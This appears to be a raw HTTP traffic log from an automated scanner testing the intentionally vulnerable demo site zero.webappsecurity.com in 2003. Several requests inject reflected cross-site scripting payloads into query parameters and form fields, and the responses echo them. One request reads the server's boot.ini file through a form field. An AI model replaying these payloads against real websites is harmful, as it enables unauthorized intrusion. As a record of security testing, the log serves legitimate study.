IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /forgot2.asp?msg2=no&msg=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"><script>alert("XSS")</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /banklogin.asp?err=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /aspnet.aspx HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30
<HTML> My ASP.NET file </HTML>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"><script>alert("XSS")</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=--><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = --><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=>"><script>alert("XSS")</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"'><img%20src="javascript:alert('XSS')">&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /p2.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:23 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 162
Content-Type: text/html
Cache-control: private
<html>
<body>
This is shown clicking the combo box labeled "Show Page Two"<br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 299
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = </P>
<P>The parameter "txtLastName" = </P><br>
<P>The <b>hidden</b> parameter "txtHidden" = </P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = </P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 104
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=/boot.iniHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 309
Content-Type: text/html
Cache-control: private
<html>
<body>
[boot loader]timeout=30default=multi(0)disk(0)rdisk(0)partition(3)\WINNT[operating systems]multi(0)disk(0)rdisk(0)partition(3)\WINNT="Microsoft Windows 2000 Server" /fastdetectmulti(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
cboPage=pc2HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
X-Powered-By: ASP.NET
Location: p2.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /cgi-bin/ikonboard/help.cgi.bak HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
